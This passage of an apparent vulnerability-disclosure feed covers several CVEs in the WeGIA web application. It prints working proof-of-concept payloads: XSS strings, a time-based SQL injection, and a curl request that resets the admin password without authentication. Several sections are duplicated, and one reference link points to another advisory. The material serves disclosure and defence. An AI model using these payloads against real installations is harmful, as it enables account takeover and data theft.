class="gallery-image" data-flex-grow="240" data-flex-basis="576px" /></p> <p><img src="/p/cve-2025-22600/401178160-2961a9d0-6ded-45f7-8a75-14cac8744e55.png" width="1398" height="389" srcset="/p/cve-2025-22600/401178160-2961a9d0-6ded-45f7-8a75-14cac8744e55_hu_360336d16c266165.png 480w, /p/cve-2025-22600/401178160-2961a9d0-6ded-45f7-8a75-14cac8744e55_hu_a35260cfc16364ff.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="359" data-flex-basis="862px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> Reflected cross-site scripting (XSS) attacks can have serious consequences, including: <ul> <li>User actions: Attackers can perform any action the user can, such as viewing, modifying, or initiating interactions with other users.</li> <li>Data theft: Attackers can exfiltrate data or install malware on the user's machine.</li> <li>Account compromise: Attackers can manipulate or steal cookies, or compromise confidential information.</li> <li>Malicious code: Attackers can execute malicious code on the user's system.</li> <li>Business reputation damage: Attackers can deface a corporate website or spread misinformation.</li> <li>Misdirection: Attackers can change the instructions given to users, which can be dangerous if the target is a government website or provides vital resources.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-v856-wjh3-4rhg" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-v856-wjh3-4rhgcode</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <h2 id="contributor">Contributor </h2><p><a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/diego50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" >Diego Castro</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Fri, 10 Jan 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-22139/ https://www.cvehunters.com/p/cve-2025-22139/ <h2 id="cve-2025-22139-cross-site-scripting-xss-reflected-endpoint-configuracao_geralphp-parameter-msg">CVE-2025-22139: Cross-Site Scripting (XSS) Reflected endpoint <code>configuracao_geral.php</code> parameter <code>msg</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-22139" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-22139</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>configuracao_geral.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the <code>msg_c</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>html/configuracao/configuracao_geral.php</code></p> <p>Parameter: <code>msg</code></p> <p style="text-align: justify;">The application fails to validate and sanitize user inputs in the <code>msg_c</code> parameter. This lack of validation permits the injection of malicious payloads, which are reflected back to the user's browser in the server's response and executed within the context of the victim's browser.</p><h2 id="cve-2025-22139-cross-site-scripting-xss-reflected-endpoint-configuracao_geralphp-parameter-msg">CVE-2025-22139: Cross-Site Scripting (XSS) Reflected endpoint <code>configuracao_geral.php</code> parameter <code>msg</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-22139" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-22139</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>configuracao_geral.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the <code>msg_c</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>html/configuracao/configuracao_geral.php</code></p> <p>Parameter: <code>msg</code></p> <p style="text-align: justify;">The application fails to validate and sanitize user inputs in the <code>msg_c</code> parameter. This lack of validation permits the injection of malicious payloads, which are reflected back to the user's browser in the server's response and executed within the context of the victim's browser.</p> <h2 id="poc">POC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="err">"</span><span class="o">><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="nb">document</span><span class="p">.</span><span class="nx">cookie</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-22139/401185701-f6cfca17-0f5b-4a97-94c6-a3186b4a4017.png" width="1361" height="326" srcset="/p/cve-2025-22139/401185701-f6cfca17-0f5b-4a97-94c6-a3186b4a4017_hu_823f98a492b13599.png 480w, /p/cve-2025-22139/401185701-f6cfca17-0f5b-4a97-94c6-a3186b4a4017_hu_e891ddf1c91c722c.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="417" data-flex-basis="1001px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> This vulnerability allows an attacker to: <ul> <li>User actions: Attackers can perform any action the user can, such as viewing, modifying, or initiating interactions with other users.</li> <li>Data theft: Attackers can exfiltrate data or install malware on the user's machine.</li> <li>Account compromise: Attackers can manipulate or steal cookies, or compromise confidential information.</li> <li>Malicious code: Attackers can execute malicious code on the user's system.</li> <li>Business reputation damage: Attackers can deface a corporate website or spread misinformation.</li> <li>Misdirection: Attackers can change the instructions given to users, which can be dangerous if the target is a government website or provides vital resources.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-xrjq-57mq-4hf8" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-xrjq-57mq-4hf8</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <h2 id="contributors">Contributors </h2><p><a class="link" href="https://www.linkedin.com/in/angelo-morette-019/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/angelo50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/angelo-morette-019/" target="_blank" rel="noopener" >Angelo Morette</a></p> <p><a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/diego50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" >Diego Castro</a></p> <p><a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/elisangela50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" >Elisangela Mendonça</a></p> <p><a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/rafael50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" >Rafael Corvino</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Wed, 08 Jan 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-22140/ https://www.cvehunters.com/p/cve-2025-22140/ <h2 id="cve-2025-22140-sql-injection-blind-time-based-endpoint-dependente_listar_umphp-parameter-id_dependente">CVE-2025-22140: SQL Injection (Blind Time-Based) endpoint <code>dependente_listar_um.php</code> parameter <code>id_dependente</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-22140" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-22140</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was identified in the <code>/html/funcionario/dependente_listar_um.php</code> endpoint, specifically in the <code>id_dependente</code> parameter. This vulnerability allows attackers to execute arbitrary SQL commands, compromising the confidentiality, integrity, and availability of the database.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/html/funcionario/dependente_listar_um.php</code></p> <p>Parameter: <code>id_dependente</code></p> <p style="text-align: justify;">The application fails to validate and sanitize user inputs in the <code>id_dependente</code> parameter. This allows attackers to inject malicious SQL payloads that are executed directly by the database. This could result in unauthorized access to sensitive information, data manipulation, and operational disruptions.</p><h2 id="cve-2025-22140-sql-injection-blind-time-based-endpoint-dependente_listar_umphp-parameter-id_dependente">CVE-2025-22140: SQL Injection (Blind Time-Based) endpoint <code>dependente_listar_um.php</code> parameter <code>id_dependente</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-22140" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-22140</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was identified in the <code>/html/funcionario/dependente_listar_um.php</code> endpoint, specifically in the <code>id_dependente</code> parameter. This vulnerability allows attackers to execute arbitrary SQL commands, compromising the confidentiality, integrity, and availability of the database.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/html/funcionario/dependente_listar_um.php</code></p> <p>Parameter: <code>id_dependente</code></p> <p style="text-align: justify;">The application fails to validate and sanitize user inputs in the <code>id_dependente</code> parameter. This allows attackers to inject malicious SQL payloads that are executed directly by the database. This could result in unauthorized access to sensitive information, data manipulation, and operational disruptions.</p> <h2 id="poc">POC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-sql" data-lang="sql"><span class="line"><span class="cl"><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="mi">7525</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="p">(</span><span class="n">SLEEP</span><span class="p">(</span><span class="mi">20</span><span class="p">)))</span><span class="n">PXhT</span><span class="p">)</span><span class="w"> </span></span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;">This payload introduces a time delay, demonstrating the ability to execute arbitrary SQL queries.</p> <p><img src="/p/cve-2025-22140/401184112-8c1267f3-ce5d-4a61-adfd-2e9edce5b960.png" width="1286" height="487" srcset="/p/cve-2025-22140/401184112-8c1267f3-ce5d-4a61-adfd-2e9edce5b960_hu_ede9a0d63418d069.png 480w, /p/cve-2025-22140/401184112-8c1267f3-ce5d-4a61-adfd-2e9edce5b960_hu_b70d689fa329f806.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="264" data-flex-basis="633px" /></p> <p><img src="/p/cve-2025-22140/401184151-d89f4a8a-8dc4-4d34-b10e-3bfc0792146c.png" width="1287" height="485" srcset="/p/cve-2025-22140/401184151-d89f4a8a-8dc4-4d34-b10e-3bfc0792146c_hu_366a6388e3c66e66.png 480w, /p/cve-2025-22140/401184151-d89f4a8a-8dc4-4d34-b10e-3bfc0792146c_hu_cd1b2d0fb42f4943.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="265" data-flex-basis="636px" /></p> <p style="text-align: justify;">Observe the time delay in the server response, indicating the successful execution of the SQL payload.</p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Data exfiltration.</li> <li>Unauthorized access.</li> <li>Data manipulation.</li> <li>Application disruption.</li> <li>Reconnaissance and enumeration.</li> <li>Compromising user credentials.</li> <li>Business impact.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-mrhp-wfp2-59h5" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-xrjq-57mq-4hf8</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/elisangela50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" >Elisangela Mendonça</a></p> <h2 id="contributors">Contributors </h2><p><a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/diego50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" >Diego Castro</a></p> <p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Wed, 08 Jan 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-22141/ https://www.cvehunters.com/p/cve-2025-22141/ <h2 id="cve-2025-22141-sql-injection-blind-time-based-endpoint-verificar_recursos_cargophp-parameter-cargo">CVE-2025-22141: SQL Injection (Blind Time-Based) endpoint <code>verificar_recursos_cargo.php</code> parameter <code>cargo</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-22141" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-22141</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was identified in the <code>/dao/verificar_recursos_cargo.php</code> endpoint, specifically in the <code>cargo</code> parameter. This vulnerability allows attackers to execute arbitrary SQL commands, compromising the confidentiality, integrity, and availability of the database.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/dao/verificar_recursos_cargo.php</code></p> <p>Parameter: <code>cargo</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>cargo</code> parameter. This allows attackers to inject malicious SQL payloads that are executed directly by the database. This could result in unauthorized access to sensitive information, data manipulation, and operational disruptions.</p><h2 id="cve-2025-22141-sql-injection-blind-time-based-endpoint-verificar_recursos_cargophp-parameter-cargo">CVE-2025-22141: SQL Injection (Blind Time-Based) endpoint <code>verificar_recursos_cargo.php</code> parameter <code>cargo</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-22141" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-22141</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was identified in the <code>/dao/verificar_recursos_cargo.php</code> endpoint, specifically in the <code>cargo</code> parameter. This vulnerability allows attackers to execute arbitrary SQL commands, compromising the confidentiality, integrity, and availability of the database.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/dao/verificar_recursos_cargo.php</code></p> <p>Parameter: <code>cargo</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>cargo</code> parameter. This allows attackers to inject malicious SQL payloads that are executed directly by the database. This could result in unauthorized access to sensitive information, data manipulation, and operational disruptions.</p> <h2 id="poc">POC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-sql" data-lang="sql"><span class="line"><span class="cl"><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="mi">7525</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="p">(</span><span class="n">SLEEP</span><span class="p">(</span><span class="mi">20</span><span class="p">)))</span><span class="n">PXhT</span><span class="p">)</span><span class="w"> </span></span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;">This payload introduces a time delay, demonstrating the ability to execute arbitrary SQL queries.</p> <p><img src="/p/cve-2025-22141/401181933-b5872753-8d9e-4ab8-8db4-364adbfd9f27.png" width="1296" height="514" srcset="/p/cve-2025-22141/401181933-b5872753-8d9e-4ab8-8db4-364adbfd9f27_hu_91ea567002b928f1.png 480w, /p/cve-2025-22141/401181933-b5872753-8d9e-4ab8-8db4-364adbfd9f27_hu_d5f826b8de5f5798.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="252" data-flex-basis="605px" /></p> <p><img src="/p/cve-2025-22141/401182010-85fbb21d-bb04-450a-93dd-9b951fe0f8d9.png" width="1262" height="525" srcset="/p/cve-2025-22141/401182010-85fbb21d-bb04-450a-93dd-9b951fe0f8d9_hu_82b1770cfbaa28a2.png 480w, /p/cve-2025-22141/401182010-85fbb21d-bb04-450a-93dd-9b951fe0f8d9_hu_6adf3018282008f1.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="240" data-flex-basis="576px" /></p> <p style="text-align: justify;">Observe the time delay in the server response, indicating the successful execution of the SQL payload.</p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Data exfiltration.</li> <li>Unauthorized access.</li> <li>Data manipulation.</li> <li>Application disruption.</li> <li>Reconnaissance and enumeration.</li> <li>Compromising user credentials.</li> <li>Business impact.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-w7hp-2w2c-p636" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-w7hp-2w2c-p636</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/elisangela50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" >Elisangela Mendonça</a></p> <h2 id="contributors">Contributors </h2><p><a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/diego50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" >Diego Castro</a></p> <p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Wed, 08 Jan 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-22143/ https://www.cvehunters.com/p/cve-2025-22143/ <h2 id="cve-2025-22143-cross-site-scripting-xss-reflected-endpoint-listar_permissoesphp-parameter-msg_e">CVE-2025-22143: Cross-Site Scripting (XSS) Reflected endpoint <code>listar_permissoes.php</code> parameter <code>msg_e</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-22143" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-22143</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>listar_permissoes.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the <code>msg_e</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>GET /html/geral/listar_permissoes.php</code></p> <p>Parameter: <code>msg_e</code></p> <p style="text-align: justify;">The application fails to validate and sanitize user inputs in the <code>msg_e</code> parameter. This lack of validation permits the injection of malicious payloads, which are reflected back to the user's browser in the server's response and executed within the context of the victim's browser.</p><h2 id="cve-2025-22143-cross-site-scripting-xss-reflected-endpoint-listar_permissoesphp-parameter-msg_e">CVE-2025-22143: Cross-Site Scripting (XSS) Reflected endpoint <code>listar_permissoes.php</code> parameter <code>msg_e</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-22143" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-22143</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>listar_permissoes.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the <code>msg_e</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>GET /html/geral/listar_permissoes.php</code></p> <p>Parameter: <code>msg_e</code></p> <p style="text-align: justify;">The application fails to validate and sanitize user inputs in the <code>msg_e</code> parameter. This lack of validation permits the injection of malicious payloads, which are reflected back to the user's browser in the server's response and executed within the context of the victim's browser.</p> <h2 id="poc">POC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">img</span> <span class="nx">src</span><span class="o">=</span><span class="nx">x</span> <span class="nx">onerror</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="s1">'XSS'</span><span class="p">)</span><span class="o">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-22143/401159443-ca95f575-8f7d-4402-97e2-b2ebfa90fa9b.png" width="808" height="555" srcset="/p/cve-2025-22143/401159443-ca95f575-8f7d-4402-97e2-b2ebfa90fa9b_hu_c37ba682c0d2617e.png 480w, /p/cve-2025-22143/401159443-ca95f575-8f7d-4402-97e2-b2ebfa90fa9b_hu_f23a6f8588915e57.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="145" data-flex-basis="349px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> Reflected cross-site scripting (XSS) attacks can have serious consequences, including: <ul> <li>User actions: Attackers can perform any action the user can, such as viewing, modifying, or initiating interactions with other users.</li> <li>Data theft: Attackers can exfiltrate data or install malware on the user's machine.</li> <li>Account compromise: Attackers can manipulate or steal cookies, or compromise confidential information.</li> <li>Malicious code: Attackers can execute malicious code on the user's system.</li> <li>Business reputation damage: Attackers can deface a corporate website or spread misinformation.</li> <li>Misdirection: Attackers can change the instructions given to users, which can be dangerous if the target is a government website or provides vital resources.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-gxh2-8jxp-m59h" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-gxh2-8jxp-m59h</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/elisangela50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" >Elisangela Mendonça</a></p> <h2 id="contributors">Contributors </h2><p><a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/diego50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" >Diego Castro</a></p> <p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Wed, 08 Jan 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2024-53473/ https://www.cvehunters.com/p/cve-2024-53473/ <h2 id="cve-2024-53473-broken-access-control">CVE-2024-53473: Broken Access Control </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2024-53473" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2024-53473</a></em></p> </blockquote> <h2 id="vendor">Vendor </h2><p style="text-align: justify;"> WeGIA (Web Gerenciador Institucional) is an integrated management system licensed under the GNU GPL v3.0, designed to enhance administration, control, and transparency for institutions. </p> <p><a class="link" href="https://www.wegia.org/" target="_blank" rel="noopener" >https://www.wegia.org</a></p> <p><a class="link" href="https://sol.sbc.org.br/index.php/latinoware/article/view/31544" target="_blank" rel="noopener" >https://sol.sbc.org.br/index.php/latinoware/article/view/31544</a></p> <h2 id="affected-product-code-base">Affected Product Code Base </h2><p>WeGIA < v3.2.0</p> <h2 id="vulnerability-description">Vulnerability Description </h2><p style="text-align: justify;">A critical vulnerability was identified in the web application WeGIa. This vulnerability allows an attacker to change the password of the admin user by sending a POST request to the <code>control.php</code> endpoint without requiring authentication or authorization.</p><h2 id="cve-2024-53473-broken-access-control">CVE-2024-53473: Broken Access Control </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2024-53473" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2024-53473</a></em></p> </blockquote> <h2 id="vendor">Vendor </h2><p style="text-align: justify;"> WeGIA (Web Gerenciador Institucional) is an integrated management system licensed under the GNU GPL v3.0, designed to enhance administration, control, and transparency for institutions. </p> <p><a class="link" href="https://www.wegia.org/" target="_blank" rel="noopener" >https://www.wegia.org</a></p> <p><a class="link" href="https://sol.sbc.org.br/index.php/latinoware/article/view/31544" target="_blank" rel="noopener" >https://sol.sbc.org.br/index.php/latinoware/article/view/31544</a></p> <h2 id="affected-product-code-base">Affected Product Code Base </h2><p>WeGIA < v3.2.0</p> <h2 id="vulnerability-description">Vulnerability Description </h2><p style="text-align: justify;">A critical vulnerability was identified in the web application WeGIa. This vulnerability allows an attacker to change the password of the admin user by sending a POST request to the <code>control.php</code> endpoint without requiring authentication or authorization.</p> <h2 id="poc">POC </h2><h3 id="burp-request">Burp Request: </h3><p><img src="https://github.com/user-attachments/assets/56fe1fdc-30c2-4cd3-9e30-ffc826f9f13b" loading="lazy" alt="image" /></p> <h3 id="curl-request">Curl Request: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-console" data-lang="console"><span class="line"><span class="cl"><span class="go">curl -X POST https://demo.wegia.org/controle/control.php \ </span></span></span><span class="line"><span class="cl"><span class="go"> -H "Content-Type: application/x-www-form-urlencoded" \ </span></span></span><span class="line"><span class="cl"><span class="go"> -H "Origin: https://demo.wegia.org" \ </span></span></span><span class="line"><span class="cl"><span class="go"> --data-raw "nova_senha=1234567&confirmar_senha=1234567&nomeClasse=FuncionarioControle&metodo=alterarSenha&redir=logout.php&id_pessoa=1&alterar=Alterar" </span></span></span></code></pre></td></tr></table> </div> </div><h2 id="references">References </h2><p><a class="link" href="https://github.com/nilsonLazarin/WeGIA/issues/791" target="_blank" rel="noopener" >https://github.com/nilsonLazarin/WeGIA/issues/791</a></p> <p><a class="link" href="https://www.wegia.org/" target="_blank" rel="noopener" >https://www.wegia.org</a></p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/</a></p> <h2 id="discoverer">Discoverer </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Sat, 07 Dec 2024 00:00:00 +0000 https://www.cvehunters.com/p/cve-2024-53470/ https://www.cvehunters.com/p/cve-2024-53470/ <h2 id="cve-2024-53470-stored-xss-in-gateway_pagamentophp-function">CVE-2024-53470: Stored XSS in <code>gateway_pagamento.php</code> function </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2024-53470" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2024-53470</a></em></p> </blockquote> <h2 id="vendor">Vendor </h2><p style="text-align: justify;"> WeGIA (Web Gerenciador Institucional) is an integrated management system licensed under the GNU GPL v3.0, designed to enhance administration, control, and transparency for institutions. </p> <p><a class="link" href="https://www.wegia.org/" target="_blank" rel="noopener" >https://www.wegia.org</a></p> <p><a class="link" href="https://sol.sbc.org.br/index.php/latinoware/article/view/31544" target="_blank" 